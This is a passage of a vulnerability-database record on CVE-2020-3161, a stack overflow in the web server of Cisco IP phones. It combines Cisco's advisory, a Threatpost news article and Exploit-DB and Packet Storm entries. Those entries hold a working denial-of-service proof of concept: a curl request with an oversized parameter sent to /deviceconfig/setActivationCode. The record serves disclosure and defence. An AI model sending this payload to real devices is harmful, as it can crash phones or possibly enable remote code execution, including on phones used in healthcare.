\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/157265/ciscoipphone117-dos.txt"}], "cisco": [{"lastseen": "2020-12-24T11:40:34", "bulletinFamily": "software", "cvelist": ["CVE-2020-3161"], "description": "A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition.\n\nThe vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. 
A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\"]", "modified": "2020-04-16T15:57:25", "published": "2020-04-15T16:00:00", "id": "CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs", "type": "cisco", "title": "Cisco IP Phones Web Server Remote Code Execution and Denial of Service Vulnerability", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "exploitdb": [{"lastseen": "2020-04-17T11:48:26", "description": "", "published": "2020-04-17T00:00:00", "type": "exploitdb", "title": "Cisco IP Phone 11.7 - Denial of service (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-17T00:00:00", "id": "EDB-ID:48342", "href": "https://www.exploit-db.com/exploits/48342", "sourceData": "# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)\r\n# Date: 2020-04-15\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://www.cisco.com\r\n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html\r\n# Version: Before 11.7(1)\r\n# Tested on: Cisco Wireless IP Phone 8821\r\n# CVE: CVE-2020-3161\r\n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\r\n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24\r\n\r\ncurl -v --path-as-is 
--insecure\r\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/48342"}], "threatpost": [{"lastseen": "2020-10-15T22:21:15", "bulletinFamily": "info", "cvelist": ["CVE-2016-1421", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3161", "CVE-2020-3239", "CVE-2020-3240", "CVE-2020-3243", "CVE-2020-3247", "CVE-2020-3248", "CVE-2020-3249", "CVE-2020-3250", "CVE-2020-3251", "CVE-2020-3252", "CVE-2020-5135"], "description": "Cisco is warning of a critical flaw in the web server of its IP phones. If exploited, the flaw could allow an unauthenticated, remote attacker to execute code with root privileges or launch a denial-of-service (DoS) attack.\n\nProof-of-concept (PoC) exploit code has been posted [on GitHub](<https://github.com/tenable/poc/blob/master/cisco/ip_phone/cve_2020_3161.txt>) for the vulnerability ([CVE-2020-3161](<https://nvd.nist.gov/vuln/detail/CVE-2020-3161>)), which ranks 9.8 out of 10 on the CVSS scale. Cisco issued patches in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) for the flaw, which affects various versions of its Cisco IP phones for small- to medium-sized businesses.\n\nAccording to Jacob Baines with Tenable, [who discovered the flaw](<https://www.tenable.com/security/research/tra-2020-24>), Cisco IP phone web servers lack proper input validation for HTTP requests. 
To exploit the bug, an attacker could merely send a crafted HTTP request to the /deviceconfig/setActivationCode endpoint (on the web server of the targeted device).\n\nThis triggers a stack-based buffer overflow due to the lack of input validation: \u201cIn libHTTPService.so, the parameters after /deviceconfig/setActivationCode are used to create a new URI via a sprintf function call. The length of the parameter string is not checked,\u201d according to Baines.\n\nThe end result is the attacker being able to crash the device, or even potentially execute code remotely.\n\nAffected products include: IP Phone 7811, 7821, 7841, and 7861 Desktop Phones; IP Phone 8811, 8841, 8845, 8851, 8861, and 8865 Desktop Phones; Unified IP Conference Phone 8831 and Wireless IP Phone 8821 and 8821-EX.\n\nOf note, according to Cisco, [some of these products](<https://www.cisco.com/c/en/us/products/collaboration-endpoints/wireless-ip-phone-8821/index.html>) (particularly the Wireless IP Phone 8821 and 8821-EX) are utilized by the healthcare industry, which is currently on the frontlines of the [coronavirus pandemic.](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1.png>)\n\nCisco has also confirmed various products that aren\u2019t affected by the flaw [on its website.](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) Beyond Cisco\u2019s patches, one mitigation for the flaw is disabling web access on the IP phones (in fact, web access is disabled by default on IP phones), according to Cisco.\n\nNew findings by Tenable\u2019s Baines also led Cisco to bump up the severity of a previously-discovered vulnerability (CVE-2016-1421) in its IP phones to critical on Wednesday. 
Previously the flaw was medium-severity ([ranking 5 out of 10](<https://www.cvedetails.com/cve/CVE-2016-1421/>) on the CVSS scale).\n\nHowever, Baines found that the flaw could be exploited by an unauthenticated actor (previously Cisco said exploiting the flaw required authentication) and could potentially enable remote code execution as well as DoS (previously Cisco found it could only enable DoS). Baines also found a product, the Wireless IP Phone 8821, to be vulnerable that wasn\u2019t listed on the affected list.\n\n**Other Critical Flaws**\n\nCisco [Wednesday also addressed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E>) critical- and high-severity flaws tied to nine CVEs in its Cisco Unified Computing System (UCS) Director and Cisco UCS Director Express for Big Data. Cisco UCS Director is an end-to-end management platform for various Cisco and non-Cisco data infrastructure components. Cisco UCS Director Express for Big Data is an open private-cloud platform that delivers Big-Data-as-a-Service on premises.\n\nThe flaws (CVE-2020-3239, CVE-2020-3240, CVE-2020-3243, CVE-2020-3247, CVE-2020-3248, CVE-2020-3249, CVE-2020-3250, CVE-2020-3251, CVE-2020-3252) exist in the REST API for both products, and may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. Below is a list of affected products and the fixed releases.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2.png>)\n\nSteven Seeley of Source Incite, working with Trend Micro\u2019s Zero Day Initiative, was credited with reporting the flaws.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory,\u201d according to Cisco.\n", "modified": "2020-04-16T18:49:27", "published": "2020-04-16T18:49:27", "id": "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "href": "https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/", "type": "threatpost", "title": "Cisco IP Phone Harbors Critical RCE Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}